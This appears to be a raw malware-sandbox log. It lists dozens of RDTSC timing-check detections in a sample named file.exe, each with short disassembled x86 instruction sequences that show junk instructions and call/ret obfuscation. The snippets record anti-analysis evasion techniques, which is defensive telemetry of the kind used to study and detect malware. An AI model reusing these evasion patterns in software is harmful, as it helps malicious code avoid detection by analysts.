Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4154F6 second address: 4154FC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48A9C3 second address: 48A9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48AB8C second address: 48AB90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48AB90 second address: 48AB96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48AB96 second address: 48AB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48AB9C second address: 48ABA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48F0BC second address: 48F0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48F0C2 second address: 48F0C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4577DA second address: 4577DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4577DE second address: 457835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D2D0Dh] 0x00000010 lea eax, dword ptr [ebp+12489522h] 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F2DFC4C7108h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 push esi 0x00000031 mov edx, dword ptr [ebp+122D2632h] 0x00000037 pop ecx 0x00000038 nop 0x00000039 jmp 00007F2DFC4C710Fh 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 457835 second address: 45783B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45783B second address: 457840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45BA00 second address: 45BA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 458358 second address: 45835D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45835D second address: 458373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F2DFCDF715Ch 0x00000010 jl 00007F2DFCDF7156h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 458373 second address: 45837E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F2DFC4C7106h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 45878C second address: 458796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F2DFCDF7156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 458B55 second address: 458B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 458B5A second address: 458B64 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2DFCDF715Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 458B64 second address: 458B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 458B71 second address: 458B7B instructions: 0x00000000 rdtsc 0x00000002 je 00007F2DFCDF7156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 458B7B second address: 458B80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 458B80 second address: 458BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a lea eax, dword ptr [ebp+12489566h] 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F2DFCDF7158h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov ecx, dword ptr [ebp+122D3830h] 0x00000030 push eax 0x00000031 jmp 00007F2DFCDF715Eh 0x00000036 mov dword ptr [esp], eax 0x00000039 mov edi, dword ptr [ebp+122D2E39h] 0x0000003f lea eax, dword ptr [ebp+12489522h] 0x00000045 push 00000000h 0x00000047 push edi 0x00000048 call 00007F2DFCDF7158h 0x0000004d pop edi 0x0000004e mov dword ptr [esp+04h], edi 0x00000052 add dword ptr [esp+04h], 00000015h 0x0000005a inc edi 0x0000005b push edi 0x0000005c ret 0x0000005d pop edi 0x0000005e ret 0x0000005f xor edx, dword ptr [ebp+122D3658h] 0x00000065 push eax 0x00000066 pushad 0x00000067 push ebx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 458BFF second address: 43BB18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F2DFC4C7108h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 add di, 6695h 0x0000002c mov edx, dword ptr [ebp+122D376Ch] 0x00000032 add dword ptr [ebp+122D284Ch], eax 0x00000038 call dword ptr [ebp+122D25A8h] 0x0000003e push ecx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F2DFC4C710Fh 0x00000046 push ecx 0x00000047 pop ecx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 43BB18 second address: 43BB37 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F2DFCDF7156h 0x0000000d jmp 00007F2DFCDF7160h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48F671 second address: 48F691 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F2DFC4C7112h 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b jnl 00007F2DFC4C710Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48FBBA second address: 48FBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2DFCDF7166h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 492FB8 second address: 492FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2DFC4C7106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4983B7 second address: 4983BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4983BB second address: 4983C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F2DFC4C7106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 498554 second address: 49855A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49855A second address: 498574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFC4C7116h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4986DA second address: 4986E4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2DFCDF7156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4986E4 second address: 4986F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F2DFC4C710Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4986F6 second address: 498724 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2DFCDF715Eh 0x00000008 je 00007F2DFCDF7156h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F2DFCDF7167h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 498724 second address: 498739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 jbe 00007F2DFC4C710Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 498883 second address: 498887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 498887 second address: 498893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2DFC4C7106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4989D9 second address: 4989F7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2DFCDF715Ch 0x00000008 jno 00007F2DFCDF7156h 0x0000000e pushad 0x0000000f jmp 00007F2DFCDF715Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4989F7 second address: 498A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 498A03 second address: 498A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 498A07 second address: 498A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 498F96 second address: 498FA6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2DFCDF7156h 0x00000008 js 00007F2DFCDF7156h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 498FA6 second address: 498FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2DFC4C710Bh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 498FB7 second address: 498FD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F2DFCDF715Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jnp 00007F2DFCDF7156h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499116 second address: 49911C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49911C second address: 49913A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF7164h 0x00000007 je 00007F2DFCDF7156h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49913A second address: 499145 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007F2DFC4C7106h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4993FB second address: 49941C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2DFCDF7156h 0x0000000a popad 0x0000000b jmp 00007F2DFCDF7166h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49941C second address: 49942C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnc 00007F2DFC4C7106h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49942C second address: 499430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499430 second address: 499434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 499434 second address: 49944B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2DFCDF7156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F2DFCDF7156h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49944B second address: 499468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFC4C710Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jl 00007F2DFC4C7106h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4980C3 second address: 4980D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 je 00007F2DFCDF7156h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4980D0 second address: 4980D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49D2E8 second address: 49D315 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F2DFCDF7168h 0x0000000c jmp 00007F2DFCDF715Ah 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A41B0 second address: 4A41F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFC4C7116h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F2DFC4C711Dh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2DFC4C710Bh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A41F8 second address: 4A420F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2DFCDF7160h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A2FFF second address: 4A301B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F2DFC4C7115h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A301B second address: 4A302C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF715Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A302C second address: 4A3030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A314C second address: 4A3166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2DFCDF7160h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A3166 second address: 4A3170 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2DFC4C7106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A36EE second address: 4A3703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF7161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A2D2A second address: 4A2D2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A2D2E second address: 4A2D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2DFCDF7156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A2D3A second address: 4A2D68 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F2DFC4C710Fh 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F2DFC4C710Eh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A2D68 second address: 4A2D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A2D6D second address: 4A2D79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F2DFC4C7106h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A3AE4 second address: 4A3AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2DFCDF7156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A3AEE second address: 4A3AF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A6B21 second address: 4A6B59 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F2DFCDF715Ch 0x00000008 jmp 00007F2DFCDF7162h 0x0000000d pop esi 0x0000000e push ebx 0x0000000f push esi 0x00000010 pop esi 0x00000011 jnl 00007F2DFCDF7156h 0x00000017 pop ebx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push edi 0x0000001b push ecx 0x0000001c push esi 0x0000001d pop esi 0x0000001e pushad 0x0000001f popad 0x00000020 pop ecx 0x00000021 push esi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A6F28 second address: 4A6F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A6F2F second address: 4A6F4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF7165h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AABF8 second address: 4AAC04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F2DFC4C7106h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AAC04 second address: 4AAC35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFCDF7167h 0x00000007 jmp 00007F2DFCDF7161h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AAC35 second address: 4AAC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2DFC4C7106h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AAC41 second address: 4AAC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jng 00007F2DFCDF7156h 0x00000014 popad 0x00000015 jmp 00007F2DFCDF7169h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF761 second address: 4AF773 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2DFC4C710Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF168 second address: 4AF16C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF16C second address: 4AF191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2DFC4C710Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2DFC4C7113h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF191 second address: 4AF197 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AF490 second address: 4AF495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B2DE5 second address: 4B2DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2DFCDF7156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B2DEF second address: 4B2E10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2DFC4C710Bh 0x00000007 jnl 00007F2DFC4C7106h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2DFC4C710Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B7C6C second address: 4B7C7F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 jc 00007F2DFCDF7156h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B7F53 second address: 4B7F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B8094 second address: 4B8098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B839A second address: 4B83A0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B83A0 second address: 4B83A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
